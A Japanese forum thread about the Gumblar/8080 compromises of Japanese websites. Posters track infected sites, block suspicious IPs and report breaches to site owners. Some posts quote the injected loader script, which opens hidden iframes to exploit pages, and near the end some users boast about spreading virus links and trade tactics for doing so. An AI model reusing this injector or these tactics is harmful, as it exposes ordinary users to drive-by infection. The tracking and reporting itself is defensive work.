　　　　　　|:::::: 　 　　 　　｜　　　／　　 　 　＼
　　　　　.　|:::::::::::　　　　　｜　 ／　　　　　　　　＼ 　　
　　　　　　 |::::::::　　　　　 ｜／ -━-　　-━- 　　＼　
　　　　　.　 |::::::::::::::　　　　} |　 　　（__人__）　　　　　|　
　　　　　.　 ヽ:::::::::::::: 　　 }　＼　　 ｀ ⌒´ 　　　　_／　
　　　　　　　 ヽ::::::::::　　ノ　　　|　　　　　　　　　　 ＼
　　　　　　　　/:::::::::::: く　　　　|　|　　　　　　　　 | 　|
-―――――|:::::::::::::::: ＼-―┴┴―――――┴┴――
　　　　 　　　／￣￣＼
　　　　　　／　　　　 　 ＼ 　　　　　＿＿＿_
　　　　　　|:::::: 　 　　 　　｜　　　／　　 　 　＼
　　　　　.　|:::::::::::　　　　　｜　 ／　　　　　　　　＼ 　　
　　　　　　 |::::::::　　　　　 ｜／ 　-━-　　-━- 　＼　
　　　　　.　 |::::::::::::::　　　　} |　 　　　（__人__）　　　　|　
　　　　　.　 ヽ:::::::::::::: 　　 }　＼　　 　｀ ⌒´ 　　　_／　
　　　　　　　 ヽ::::::::::　　ノ　　　|　　　　　　　　　　 ＼
　　　　　　　　/:::::::::::: く　　　　|　|　　　　　　　　 | 　|
-―――――|:::::::::::::::: ＼-―┴┴―――――┴┴――
　　　　 　　　／￣￣＼
　　　　　　／　　　　 　 ＼ 　　　　　＿＿＿_
　　　　　　|　　　　　　　　｜　　　／　　 　 　＼
　　　　　.　|　-━-　-━-｜　 ／　　　　　　　　＼ 　　
　　　　　　 |::::: （__人__）　｜／ 　-━-　　-━- 　＼　
　　　　　.　 |::::::::｀ ⌒´ 　 } |　 　　　（__人__）　　　　|　
　　　　　.　 ヽ:::::::::::: 　 　 }　＼　　 　｀ ⌒´ 　　　_／　
　　　　　　　 ヽ::::::::::　　ノ　　　|　　　　　　　　　　 ＼
　　　　　　　　/:::::::::::: く　　　　|　|　　　　　　　　 | 　|
-―――――|:::::::::::::::: ＼-―┴┴―――――┴┴――

起動時にF8とか連打して出るメニューにリカバリーとかなかったっけバリュースター

>>115
NECに電話して型番とシリアルナンバー伝えて有料リカバリディスク買えばいいんじゃ

>>115
お気に入りの型番なんだ
へぇ〜この板のアンチとおんなじジャン〜

ソフト入手しようと思ったらavast!が怒ったんだけど感染してる？

Hardwaremania BlackBox
://blackbox●hardwaremania●com/en/home

>>122
/js/app.js

>>122
Webシールドが遮ったなら大丈夫

>>113
ドラクエノレベルアップの音
にでも変えとけｗ

そういえば、一時期出てた不審なIPアドレスどうこうとかはまだあるの？

今、自分が遮断設定にしてるのは
67.212.81.67
67.215.237.98
67.215.238.194
67.215.246.34
91.215.156.74
91.215.156.75
91.215.156.76
94.76.250.73
94.229.65.174
193.104.12.20
195.24.76.250
210.51.166.228
216.45.48.66

ああほんと（苦笑）

感染してから小手先で情報送信防げるとかしてもね

>>126
0：基本的な対策(アップデート等)を行っておく ←必須

1：JAVAScriptをOFFしておく ←推奨
2：「:8080/」を含むURLを全て蹴る ←可能なら

お前ら8080って何て呼んでる？
・ハチゼロハチゼロ？
・ハチマルハチマル？
・ハッセンハチジュウ？

>>129

1と2は不要

そこまでするなら
flashとpdfリーダーアンインストールしろってこった

1はpdfビューアのJavaScriptをオフ、ならありじゃね？

ガンブラー：神戸市のサイトに感染。被害拡大中
http://tsushima.2ch.net/test/read.cgi/news/1268536865/

>>134
>>91

　　　このサイトは改竄されてるわ

　　　　 　 　 _,,.. -─-- ､,
　　　　　,.::'´:::::::::::::::::::::::::::｀::..､___　　 | 　＿／
　　　　/::::::::/:::;:::::::i:::::::::;::::::::::::::く　　〈7´　　　ﾋﾟｷｰﾝ
　　　 ,'::::::::;'::::/:::/;ﾊ::::::;ﾊ:::::i:::::::ﾊ 　 /
　　　 |::::::::|:::::|::/メ､|__/　|_ｨ!､::::!::!　　　　∧
‐　─.|::::::::|:::::|7´ ∩　 　 ∩Y|::|::|　─ﾍ/　 ':,　/`ーw─'^ー　─　-
　　　 |::::::::|::::八.　り　　 . り 〈::」:」　　　　 　 ∨
　　　 |::::::::|:::::|""　　　 _　　",ﾊ|
　　　 !::::::::|:::::|＞,、 　 __,.. イ:::::|
　　　,':::::::::|:::::|´　＼_「｀＼:::|::::::|　　　　　＿＿＿＿＿＿＿＿_
　　./:::::::::::;＼ﾄ､ 　 }_X_{　.〉､:::::|　　　　//　　　　　　　　　　　/
　 /:::::::::::/　　､|＼／ム`ｧl/ ＼!　　　//　　Tewinabook.　　/
／:::::::::::;'　 ´￣/＞‐-､　./ 　　 ＞‐//　　　　　　　　　　　 /
:::::::::::::/|.　　　 | |　 ､ﾝ^'く::＼　　　//　　　　　　　　　　　 /
──‐‐!､＿＿|.」-‐'ーﾍ‐'─'` ｰ//＿＿＿＿＿＿＿＿/───
　　　　　　　　　　　　　/l二二]O）＿l王l＿l三l＿＿oOﾝ
　　　　　　　　　　　　　ヽ､＿＿＿＿_ノ

キモイもん貼るなよ

キモイ顔の奴はレスするなよ

じゃあ2ch動かなくなるじゃん

.substr連発型
//www●w-com●jp/

チェッカー3は未対応だが･･･作者殿はどこ？

www●w-com●jp
↓
/1home/?S=D
/2company/?S=D
/2company/?D=A
/3business/?N=A
/5reference/?N=D
/5reference/?M=D
/5reference/?N=A
/5reference/?S=D

飽きたので開発終了です

スレチで申し訳ないんだけど、今使ってるフリーのアンチウィルスってガンブラーとか8080には弱いみたいだから、これを期に有償ソフトに変えようかと思ってるんだけどそれにするか悩む
AV-TEST.orgでいつも優秀で、ヒューリスティックも高性能なG Data、
AV-TESTでは二番目ながらかなり高性能なマカフィー、
AV-T(ryでは上位3位には入らないけど、ttp://honeywhales.com/では圧倒的に高性能なノートン

まぁぶっちゃけ新種の対応には厳しいからどれでもダメなんだろうけどｗ

一般的にはG Dataを選ぶんだろうけど、gredAVアクセラレータとは共存できないみたいだし、無難にマカフィーでも良いけど除外設定できないし、何よりhoneywhalesの結果が引っかかる
確かにhoneywhalesの地図にあるVirusTotalの結果を見るとマカフィーやG Dataでは検出できなくてノートンでは検出できるってものが多いんだよね
それに、AV-TEST.orgとか、AV Comparativesのレポートは裏でお金の取引をして順位を上げてるなんて噂もあるし（嘘だと思うけど


どっちを信用すれば良いのかな？
ここのスレには毎度お世話になってるから、今回も書き込んでみました。宜しければご回答お願いします

>>143
そんなもんに神経使う前に日頃からの対策に神経を使ってください

>>144
大丈夫既に各ソフトウェアのアップデートもしてるし、Firefox+Noscript+RequestPolicyでリダイレクトを防止して、AdblockPlusで8080ドメインをブロックしてる

>>143
サイト改竄に対してセキュリティソフト依存は危険。

極端な話、穴をしっかり塞いでおけばノーガードでも感染しない。

>>146
あーそういえば穴を塞いでおけば大丈夫だったね。基本を忘れてた
セキュリティソフト依存が危険な事はわかってる。
だけど、ゼロデイ状態とかになったときの為とか、ガンブラー以外のウィルスに対しても広く対応させる為とかで、補助的な意味でウィルス対策ソフトの乗り換えを考えてる

３行目なら完全にスレチ

ソースの最後の方に　function〜ゴチャゴチャ書いてたら
すべてアウトでいいの？
.>>5　で　反応しないんだけど

どうやったらそんな発想ができるんだろう……

> 反応しないんだけど
無害だろｗ

トレンドマイクロだと
Possible_Gumb-3　と　反応したから
確かめてみたかった

>>147
ゼロデイならほとんどの場合セキュソフトのヒューリスティックに引っかかるかどうかだから
下手すると乗り換え前のソフトだと検出したが乗り換え後のソフトだとスルーと言うこともありえるぞ

>>147
ある程度わかってる人なら乗り換えても問題はないと思うけど
そうじゃない人には慣れてるの使っとけといってる
実際そこまで大差ないし

今変えたとして直後にそれが調子悪くなったらまた変えるの？
毎回なんかあるごとに乗り換えてたらキリがなくね？

115です。２ちゃんネラーって、ガヤガヤとうるさいだけで全く当てになりませんね。

ろくなレスが付かないので同じ質問をOKEaveに書き込んだら、たちどころに適切な
役立つ投稿が何通もはいりました。

OKWaveなら知ってるお^^

>>155
>>115はスレチ。
だから誰もマトモに答えなかった。以上。

どう見てもなりすましなのにいちいち釣られるなよ・・・

>>153
あーそっかｗヒューリスティックになるんだよなｗ
確かノートンとマカフィーは・・・微妙だったような
前入れてたのはAntiVirとMSEだったからなかなかの性能だったよなー

親がノートン使ってて、3台までインストール可能ってなってたからさっき入れてみたけど、調べてみたらオンデマンドもヒューリスティックもAntiVirよりも下だったな＠AVComparatives

>>154
大差ないのか・・・orz
確かにキリないなぁ。どうしよう
使い慣れてるのかー。だったらフリーのになるのかなぁ
確かに、ずべてのウィルスを検出できる製品なんてないし、ウィルスも日々大量生産されてるわけだし、AV-TESTとかはあくまで一例であって、実際はそんなに大差ないのかもしれないな

とりあえずテスト機関のレポートにあまりとらわれず、よく考えてみる事にする。答えてくれた人、ありがとうございます。

連レススマソ。↑は143です

もうええっちゅーねん
どんだけ語るんだよ

>>149
埋め込みに失敗(？)とかコメントアウトされてるとかで
実際には機能してないのもある

NoScript使えよ

おことわりします

下火になってきたみたいだな

>>142 orz

ic-isweb●hp●infoseek●co●jp/
isay●livedoor●biz/ ←！

<!--トロイを絶賛配布中！（無料）-->
www●plci●net/egf/
<!--更新履歴（不要の場合はここから削除）-->
<div class="module-archives module">
<div class="module-header"
<script>var (以下略

･･･コードは必要なんでしょうカネ？

嫌な無料配布だな

ヒマそうな冗談者は
腕試しにフランスドメイン（fr）洗ってみてくれ

>>168
なして？

ttp://i40.tinypic.com/20a6z4w.jpg
ここんとこずっと仏が被害で突出しているみたい

オマケ

国名略号 and 国名ドメイン早見表
ttp://www1.coralnet.or.jp/kusuto/Data-Room/country-codes.html
EU諸国 マップ
ttp://www.d.umn.edu/cla/faculty/troufs/anth1095/images/map_eu_countries_europe.jpg

genom氏のサイトには特定の個人や団体の情報なんて書かれてないだろ。
何でわざわざモザイクなんてかけるんだ？

その読み間違いは初めて見た

avast!スレより
www●ebookjapan●jp/ebj/title/10429.html

>>168
けんさくわーど
"new String();" "new Date();" "new Array();" -JAVA -JAVAScript site:.fr

ぐーぐる先生
ttp://www.google.co.jp/search?q=%22new+String%28%22+%22new+Date%28%22
+%22new+Array%28%22+-JAVA+-JAVAScript+site%3A.fr&btnG=%E6%A4%9C%E7%B4
%A2&hl=ja&lr=&sa=2

びんぐ
ttp://www.bing.com/search?q=%22new+String%28%29%3B%22+%22new+Date%28%
29%3B%22+%22new+Array%28%29%3B%22+-JAVA+-JAVAScript+site%3A.fr&go=&fo
rm=QBLH&filt=all

禿(やふー)
ttp://search.yahoo.co.jp/search?p=%22new+String%28%29%3B%22+%22new+Da
te%28%29%3B%22+%22new+Array%28%29%3B%22+-JAVA+-JAVAScript+site%3A.fr&
ei=UTF-8&fr=top_ga1_sa&x=wrt

>>170
それ、スクリプトが埋まってるって意味で言ってる？

>>174
ずいぶんアレな仕込み方だが･･･
//w●robints●us/us●js
↓
//w●robints●us/cnzz●html
//w●robints●us/614●html
//w●robints●us/jf●html
//w●robints●us/jg●html
この先はシラネ

※４発装填中
http://w●robints.us/us.js

４発の内訳

try{__m}catch(e){__m=1;document.title=document.title.replace(/\<(\w|\W)*\>/,"");
if (document.cookie!='__m'){
document.cookie='__m;expires='+(new Date(((new Date()).getTime()+600000)).toGMTString())+';';
document.write("<iframe src=http://w●robints.us/cnzz.html width=0 height=0></iframe>");
document.write("<iframe src=http://w●robints.us/614.html width=0 height=0></iframe>");
document.write("<iframe src=http://w●robints.us/jf.html width=0 height=0></iframe>");
document.write("<iframe src=http://w●robints.us/jg.html width=0 height=0></iframe>");
}}

飛ばされる先は
<iframe src=hXXp://w●robints●us/cnzz●html width=0 height=0>
</iframe>
↓
<div style=display:none>
<script src="hXXp://s10●cnzz●com/stat●php?id=1990191&web_id=1990191" language="JavaScript">
</script>
</div>

マイクロソフトのデータから総計としては少ないがこの御時世に未だMS06-014エクスプロイト。614.html
ttp://img.microsoft.com/japan/security/images/contents/SirV7MalType.png

自国で撒くと足がつきやすいから他国に撒く
どうせ撒くなら足がつきにくい国はどこか？
答え.ウイルス黒人街中国ロシア

でもどうして未だにMS06-014なのか？614.html

Malwarebytes' Anti-Malware 公式サイト
http://www.malwarebytes.org/mbam.php

e-bookjapan、凸ってみた。
ツイッターのアカウントあるけど、こっちも凸ってみる？

もう埋め込みの方は更新しないのかな。
毎週更新されて楽しかったのに。

>>181
戦略的撤退(休眠)のような気がする

e-bookjapan対応速かった。
マトモなとこだとホッとするな。

凸乙
メンテになってるな

「おいくつですか？」
「キャー痴漢！」
なんてリスク背負いたくないしな

いつの間にかflashplayerが手動DL出来なくなっているんだが
最新版を直DLできるURLとかないですかね？（以前は、ここをクリックで手動DL可能だった）

>>186
最新版ならいつもこのアドレス
ttp://fpdownload.adobe.com/get/flashplayer/current/install_flash_player_ax.exe
ttp://fpdownload.adobe.com/get/flashplayer/current/install_flash_player.exe

>>187
ありがとう
しかし・・少し前までは通常ページからダウンロードを選択→ブラウザのブロック機能で
インストーラの発動を止める→ここをクリックで手動DLが可能だったのに何というせこさ・・

OperaやChromeならオフラインインストーラが落ちてきたはず…

ebookjapan復帰した。
「ウイルス感染確認のお願い」のページで、なぜアバスト！を勧めてるのかは不明だけど。

>>184
トップページではちゃんと「ウイルス感染の連絡があった」と記述されてた。
サブページはメンテって記述。
マトモな対応だ。これが普通だよな。

なんかこのスレで初めてマトモな対応をしたサイトを見た気がする

アバスト!は無料だし今回genoウィルスにまじめに取り組んでる少ないウィルス対策ソフトだからじゃないかなと推測

あ、そうそう、忘れてた。

puremis●net/
mrtb●puremis●net/
jmt●puremis●net/

随分ほったらかしにしてるみたい。

>>192
無害だからね

>>192
おちゅ。
エックスサーバーにつーほーしますた。

>>193
？

ebookjapan陥落時のキャッシュを拾ってみた

■アクセス注意！
ttp://74.125.153.132/search?q=cache:MVuDVrdidDQJ:www.ebookjapan.jp/ebj/tag_genre.asp

<meta name="Keywords" content="〜〜中略〜〜
,貸本マンガ<Script src=hXXp://w●robints●us/us●js></Script>" />

変な所に仕込んであるしｗ

アクセス注意って言うぐらいなら.を●に変えろよ
それともアレかあえてひっかける釣りか?

芸能人ブログＩＤ・パス流出、ホリプロ元社員逮捕
http://www.yomiuri.co.jp/national/news/20100317-OYT1T00021.htm

　インターネット広告会社「サイバーエージェント」（東京都渋谷区）が運営するブログサイト「アメーバブログ（アメブロ）」を
利用していた芸能人のＩＤとパスワードがネット上に流出した事件で、警視庁が、大手芸能事務所「ホリプロ」（目黒区）
元契約社員岡田邦彦容疑者（３０）を不正アクセス禁止法違反の疑いで逮捕していたことがわかった。

　逮捕は３月１３日。

　捜査関係者によると、岡田容疑者は今年１月１日未明、タレントの藤本美貴さんのブログに、藤本さんのＩＤとパスワードを
使って不正に侵入し、芸能人４４５人分のＩＤとパスワードなどが記載された個人情報リストを張り付けた疑い。その結果、
リストは藤本さんのブログを閲覧した人がクリックすると、ダウンロードできるようになっていた。

　このリストはサイバー社の内部文書。同社社員が日頃から仕事上の付き合いのあった岡田容疑者に誤ってメールしたのが原因だった。
アメブロは日記形式のホームページ。サイバー社によると、事件後、リストの芸能人らのパスワードは変更されており、流出による被害は確認されていない。

（2010年3月17日03時03分 読売新聞）

>>197
ホリプロの元社員も悪いけどメールで送ったサイバーの社員も罰せられるべきだよな

スレチ

ID分かれば後は力押し
ゲイツは本当に便利なチートマシンを作ってくれたぜ

>>197
パスワード送られてきたらログインしたくなっちゃうかもな
俺もミキティのパスが送られてきたらログインしちゃったかもしれん
でもリストをブログに貼り付けることはしないわな

あぁ、そのリスト、おれもブログみたらダウソされてきたので持ってるわ
すげーいい加減なexcel管理だなぁと思った
もっときれいに管理してやれよ
あと、芸能人なのに自分の誕生日パスワードにするのはやめろ
公開されてるのに無用心すぎるだろｗ

顧客の個人情報を暗号化もせずにメールで送る非常識なクソ企業
日常的にずさんな管理しているんだろう。

【フリー併用】avast!+MSE+gred AntiVirusのトリプルエンジン【最強仕様】

以下の順番にインストールする。

avast! Free Antivirus のダウンロード （日本語公式ページ）
http://www.avast.com/ja-jp/free-antivirus-download

ウイルス、スパイウェア、マルウェア対策 | Microsoft Security Essentials
http://www.microsoft.com/security_essentials/

gred Anti Virus アクセラレータ | ダウンロード
https://www.gred.jp/avx/download.html

（ちなみに併用使用でも問題はありません）

釣りだろうけど
実験モルモットな組み合わせだなｗ

avastとmseを併用する価値が見出せない
併用は監視の重複で権利の奪い合いになってスルーが起きやすくなるからかえって性能が落ちる
いろんなとこにコピペしまくってるとこ見ると被害者を増やしたいのかね

>>204
avast!++gred AntiVirus
MSE+gred AntiVirus

こうだろ？

Avira＋avast!(4.8のwebシールドのみ)＋comodo＋SpyBot(免疫化のみ)
この組み合わせは良いぞ

avast!+MSE（avastの検疫ファイルを除外指定）で無問題。

トリプルエンジン(笑)

>>2以上の対策は自己満足だから好きにすればいいけど、ウザいからいちいち宣伝しないでね。

ちっ、うるせーな

いやあ彼ももう忘れ去られた存在だねえ

>>210
あ？ルナスケープなめてんのか？

ルナスケープってなにそれ食えんの？

Adobe Readerをアンインスコして、他社製のPDF読み込みソフトを導入するのはGumbler対策になる？ならない？

ここで断言できる人はいないので作ってる人にきいてください

>>216
Gumblar対策だけならReaderのままでもブラウザから自動起動されないようにすればいいだけだろ

>>216
なる

>>217
断言ってお前馬鹿か？

クチチ

217じゃないが…
>>216に回答すりゃ、それは断言になるだろ
なに？よくわからないあいまいな答えが欲しかったの？

だってそりゃお前、日本人だもの。
「どちらともいえない」が一番しっくりくるに決まってるべ。

また変化する可能性もあるのに大丈夫とはいえないだろ

Adobe Readerだって最新版使えばいいだけ
前のバージョンだってJavaScript無効にすればいいだけ
他社製にする必要もない

既出のこれらのURLのスクリプトが変わったかもしれない
今まで検出していたavast!がスルーするようになった
VTの結果もほとんど: 3/42 (7.15%)

mogulclub●com/BANDS_AND_GIGS/index_CIARA●html
s1●shard●jp/dreaming/
s1●shard●jp/dreaming/mitubishiucar/index●html
www●avis●ne●jp/~muranaka/
www●hct●zaq●ne●jp/cpacs503/
www●i-paradise5●jp/~simple/otona/index●php
www●kadoma-c●com
www●kikuyakikai●com
www●sesica●co●jp

ttp://www.virustotal.com/jp/analisis/eaa158057d418417724f23fc8d9ee0b13550f5f52b409b3b373eb6ccdb4db791-1268903269
ttp://www.virustotal.com/jp/analisis/eab4a78a1dea07c29183259d476ff1646e04c0a9b3d9f50e13a30a9939431cf1-1268903344
ttp://www.virustotal.com/jp/analisis/5e3172387fe0932c3fcf9409f63c906e944283d2e7a453c8783ee4b13ef891e7-1268903385
ttp://www.virustotal.com/jp/analisis/6fc63e268e8bd0a9e2a385d3e7b833d1fa3640c6ca41bc758a7541dc7929d03c-1268901812
ttp://www.virustotal.com/jp/analisis/08b65c9a24c03b21cbf0ac849a3446511d4fab346526a98241077af45107e52f-1268903427
ttp://www.virustotal.com/jp/analisis/65eb3f33b66cfd3fc7745502c8c8275e632e66227db73126dbc624cc274f4c56-1268903475
ttp://www.virustotal.com/jp/analisis/3e77086644c08945bcd61ed7158702f6e31cf24e604bafd6d57d688176a781a5-1268903551
ttp://www.virustotal.com/jp/analisis/8f933e2e964ee8f32c5b30fff6f90dd00a890844f58195c6422de2a8c923c158-1268903603
ttp://www.virustotal.com/jp/analisis/02aa30e73bfa773f56eb0aedd94e7d0404f42a45c5ae6daf0d4e7211ac5a0b75-1268903654

ただアドビ製品は今までMS以上の放置プレイで脆弱性修正を怠ってたから
最新版だろうがJavaScriptオフだろうがまだまだ山ほど脆弱性が残ってそうなのが怖いんだよな

>>192
403になっとるな。本に紹介されたばっかりなのにね。
これ、お詫び無しパターンだぜ。

>>225
s1●shard●jp/dreaming/
電凸完了

>>225
www●avis●ne●jp/~muranaka/
電凸完了

>>225
www●hct●zaq●ne●jp/cpacs503/
電凸完了

あとは明日以降

これらはたぶん再発
e-risingsun●net
faac3020●cpinet●jp/
www4●ocn●ne●jp/~ikl/member/index●htm
www●mfreep●com →スクリプトはあるがaguseでは外部と接続するオブジェクトを検出しなかった

VTの結果は 3〜4/42
ttp://www.virustotal.com/jp/analisis/1e78d4c8d6fca221474295925a83a578555088946bc69e6eb3d8cd604b50659b-1268913734
ttp://www.virustotal.com/jp/analisis/9df24eb6059480edf3b33e5483e58d3f85bcb1a10ff5a62a09b9626632edbef6-1268913822
ttp://www.virustotal.com/jp/analisis/672dae1c7819f7ffb97697bd689eadb41352c05a3d1fa90f19c0cedf0315a6ef-1268913915
ttp://www.virustotal.com/jp/analisis/b83677038bf352b34be91756d1ec4da1d555ce1b47b9b4842246969721bff227-1268913993

>>225
挿入した不要な文字を函数で削除するタイプ
主要部はこれまでの応用だけど…

BuyTheBlenderma●ru:8080
404 Not Found
404 Not Found
YourSuperPool●ru:8080
SuperSuperMall●ru:8080
TheBlenderTutorial●ru:8080
TheBlenderTutorial●ru:8080
YourSuperPool●ru:8080
ExcellentBlender●ru:8080

どれもドメイン名に大文字が入ってるんだけど、
ひょっとして、これだけで検出できなくなるとか？

>> 232
これも大文字入り

SuperSuperMall●ru
TheBlenderTv●ru
BuyTheBlender●ru
YourSuperPool●ru

> スクリプトはあるがaguseでは外部と接続するオブジェクトを検出しなかった
どれも、この5 IPのラウンドロピンですね
91●121●7●26
91●121●24●139
91●121●134●58
91●121●137●124
91●121●163●215

電凸とか男前過ぎる。

route:          91.121.0.0/16
descr:          OVH ISP
descr:          Paris, France
origin:         AS16276
ここに電凸できれば、超男前だな

www●kikuyakikai●com
感染している事を知っているにもかかわらず放置
電話しても担当者はいない、ここは会社ではなく個人の家
などと訳のわからない対応を行い、会社としての責任を果たしていない。

googleから客来ないから潰れますよ、って言えばいい

>>229
修復したけど感染告知無し。
こういう宿は泊まっても不快な思いをするだけだろうな。

改竄されすぎｗ
//www●aquaview●jp/q_a/index●html

//www●kanone●jp/

俺がアクセスしたページに限って改竄されてて笑いました

>>232とかのVTで検出成功してるアンチウイルスって何？
avast、AVG、カスペ、ノートン、G-DATA辺り？

>>237
確認の為に電凸してみました。ﾜﾛﾀww

GMOインターネット株式会社に凸。。
んで、完了。

>>206
亀レスで申し訳ない
それって、そもそもスルーされて監視が出来ないってことだよね？
例えば３つアンチウィルスを入れてたとしてそのうち一つでしか検出出来ないウィルスだとする
その唯一検出できる製品がスルーして、取りこぼすっていう可能性もある？
検出のされにくさとか関係ないんだよね？

>>225
www●i-paradise5●jp/~simple/otona/index●php → 電話が繋がらないのでパス
www●kadoma-c●com → 上流に凸、既に別の有志より連絡が有ったとの事
www●kikuyakikai●com → >>244
www●sesica●co●jp → 上流に凸完了

一休み

>>245
AvastとMSEの組み合わせで起きるかは知らんが

昔流行ったセキュリティブログで紹介された
Avast（常駐ガードオフでシールドはオン）＋AntiVirでダブルエンジン（）というやつでは
検出できずにスルーしたという話があった気がする

twentyfour-24●com

www●jde-net●co●jp
ここも電話してもやる気のない対応
これが社長なんだから笑う

おまいらこんなにどうやって見つけるの？

www●jc-consulting●jp
www●e-kudamono●co●jp

www●pflaster●jp/2009/12/

>>250
味噌県の人間なんてそんなもんだ

we-rank●com/modules/bulletin1/rss●php
kallook●com
www●trajal●net/PR/index●html
--
www●bestofunder●com ←（笑）

>>249
コレはレンタルサーバかな？
全滅してる。
http://www.google.com/search?num=50&hl=ja&q=twentyfour-24.com&btnG=%E6%A4%9C%E7%B4%A2&lr=lang_ja&aq=f&aqi=&aql=&oq=&gs_rfai=

>>256
レン鯖じゃないよ。

誰かろりぽ通報頼んだ

>>256
まじだｗｗｗ
全部にこのサイトはコンピューターに(ｒｙ

SEOばっかりだ

umai●kitcut●org/omegatukau/
定番xrea

全部感染してたらSEOも糞も無いという。
Google先生もいっそのこと検索結果から消してしまえばいいのに。

>>256
ふつくしい…

素人だからよくわからんが、オーキタ家具とかいう家具屋さんのHP見てたら、
ウイルスバスターさんから感染の警告きた・・・　もしかしてそのサイトウイルスばらまいてる？

>>263

感染してますね

やっぱり・・・

オーキタ家具（絶賛放流中）
www●o-kitakagu●jp/

>>266
Lynxで問い合わせフォームからつーほーした。
common/js/base.js も ぁぅぁぅぁー

一向に下火にならんな
アホは、ウィルスサイトばらまいてるし
バカは、感染してると教えても再改ざんされるし
ここの人達の努力は、偉いよ

自分のＰＣが感染してるかどうかを簡単に調べる方法ありますか？
スタートアップにsiszyd32.exeとTMD.tmpがいなくてregedit.exeが起動できれば
感染してないってことになりますか？

スレの前の方に何か書いてあるぞ

>>269
いいえ
ありません

avastのブログに8080他の記事があった
http://blog.avast.com/2010/03/19/would-you-like-an-iframe-sir/
前菜が難読化Iframe、メインが8080本体でデザートが8080のスクリプト
「おいしい」メニューだって…

nagoya●cool●ne●jp/yukaridazou

www●thaishin●co●jp/reform/index●html
www●knack●co●jp

ぁぅ･･･
http://www.google.co.jp/search?hl=ja&source=hp&q=%22new+String%28%29%3B%22+%22new+Date%28%29%3B%22+%22new+Array%28%29%3B%22+%22%3Bdocument.body.appendChild%28%22+-JAVA+-JAVAScript&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=

sandia●co●jp
www●hdta●jp
www●jc-consulting●jp/


閉鎖してもトロイの配布は止めないらしい･･･
www●daini-survey●com/
>誠に申し訳ありません。
>都合により、当ホームページを一時閉鎖させていただきます。
>これまで、当ホームページへアクセスいただき、有難うございました。
<<!-- ＼(^o^)／オワタ -->

263の素人なんですが、どうやら踏んでしまったので対策について教えてほしいです。FTPパスワードの変更ってのは具体的に何をしたらいいですか？

とりあえず、踏んでしまったので、しばらくオフラインで使用して、その後リカバリーしようかなっと思ってます。
OSが入っていないドライブもフォーマットしないとだめなんですかね？

あと踏んだ時のPCの状態を書いておきます。

ウイルスバスターから警告くる→いつの間にかウイルスが隔離されてる(時間情報からオーキタ家具HPと判断)→総合検索(クッキーしかひっかからず)
→シマンテックさん・マカフィーさんの無料検索サービスでもひっかからず→とりあえずここに報告→現状

環境：Windows7 Ultimate (Updata最新版)
アドビリーダーUPDATAがあったが、言語サービスだったので、おそらく関係なし
FLASHPLAYER：最新版
IE8：初期設定のまま

普通に侵入されました(泣)

釣り乙

はいはいフォーマットフォーマット

>>276
マジレスするとftpパスはウェブサイトをftpで管理してる人以外には関係ない

最低限システムドライブのフォーマットは必要だが
システム以外のドライブにウイルスのコピーが残ってないとは言えない
心配ならすべてのドライブをフォーマットするのが確実

>>279
なるほど、そういうことなんですね・・・ありがとう。

というかバスターが止めてくれたんなら問題ないでしょ

改竄？
http://www●ibs-ishii-sports●co●jp/

全部消されてるのだが。

でもウイルスバスター入れてたら感染しないよ？
なんといっても販売本数No1だからね

>>276
ウイルスバスターが警告している時点で防いでるんじゃないか
脆弱性の対策もしているようだし感染はしていないだろ

>>276
>FLASHPLAYER：最新版
バージョンはちゃんと書こうね。「10.0.45.2」とか。

ani-an●co●jp/
posh-e●com/index3●htm
minatomo●jp/
dxenglish●value-net●net
allgolf●web●fc2●com/a21 ←！
www●granship●com/index●html

hamu22●hp●infoseek●co●jp
jumpfine●com/hiesyo1/
www●clca●or●jp/club/　←再感染
www●slowstylegym●com

ちょっくら出張して
あらゆるスレで踏ませてきたぜｂ

(＞ｗ＜)ｂ俺GJ！


(�Vд�V)ﾉｼ AIONスレのみんなー♪みてるー♪

↑これ犯罪じゃね？

>>289
(�VД�V)え！？






(�Vд�V)お前犯罪者なの？これってお前のことだよな

まだまだ頑張るお
地雷マスターだおヽ(�Vд�V)ﾉ今日だけで5000人以上に踏ませたお！

>>291
素直に感動。

そこまで出来る勇気が欲しい。

ん？快楽殺人と同じような考え？
取り敢えず影ながら応援。

(�Vд�V)なんか最近、本当に無知な奴が増えてきたよな
ウィルスURL踏ませるくらいじゃ罪には問われないんだぜ
それは俺がブログでも証明している
ttp://ruhuraro.blog57.fc2.com/blog-entry-161.html

まぁこの状況でURL踏むのは不安って奴は
「ウィルス 踏ませることは犯罪か？」で検索してみろ
http://search.yahoo.co.jp/search?fr=slv1-ff2tbtop&p=%E3%82%A6%E3%82%A3%E3%83%AB%E3%82%B9%E3%80%80%E8%B8%8F%E3%81%BE%E3%81%9B%E3%82%8B%E3%81%93%E3%81%A8%E3%81%AF%E7%8A%AF%E7%BD%AA%E3%81%8B%EF%BC%9F&ei=UTF-8

うーん
しかし前にブログでまとめた内容だと我ながらわかり難い内容になってるな
(�V｀д´�V)よし、こりゃ近々また更新すっか！


今度スティッカムとかでウィルス踏ませる実況配信とかしてみよかな

>>293
いや踏ませたぐらいで犯罪にならないのは知ってるがｗｗｗ

ただそれをする行為は快楽殺人と同じなのでは・・・と思っただけ。
俺は踏ませようとするだけで無理。

ブログは拝見させて貰ってる。
何故か惹かれる。

殺人はおおげさだべ
まぁPC命な連中からしたら殺人的なのかもな
俺の影響でPC初期化しちまった奴に見つけ出して殺してやると言われたことも多々ある。

(�Vд�V)俺様としてはただのゲーム感覚
踏ませる立場の心理は大体似たようなもんだろ
踏む奴は馬鹿、平和ボケ乙、ざまぁって感じだな

宣伝乙

何が俺様だよ。

<(�V｀д´�V)>俺様えっへん！

>>296
それは「殺す」って言った方が悪い。それは殺人予告だな。

それに常時ソフト（常識）付けずに安易に踏む香具師が悪い。
このガンブラーのご時世でさｗｗｗｗｗ

俺も踏ませようかな・・・
一応そういうの好きな方。

(�Vд�V)ﾉ いいぞいいぞ！やっちゃえやっちゃえ！地雷デビューだー！
ちゃんと報告しろよ＞ｗ＜踏ませるのもっと流行れ！

<(�V｀д´�V)>そしてまたエッヘン！
　　／　＼

>>301
どこが狙い目？

狙い目とかねーよ
適当に行き当たりばったりで楽しめばいいさ
ただ過疎過ぎるとこだと言うまでもなく反応がなくて駄目

貼ってすぐに↑ウィルスだから踏むな！
って書かれた場合は次へ移行すればいい
自演で誘導するのもいいし。

そうだ最初はIDのないスレでやってみれば良い('д')

>>304
お手本見せてよ。よく分からない

>>304
言いだしっぺなのになｗ

キモイのが粘着し始めたか
このスレももう終わりだな

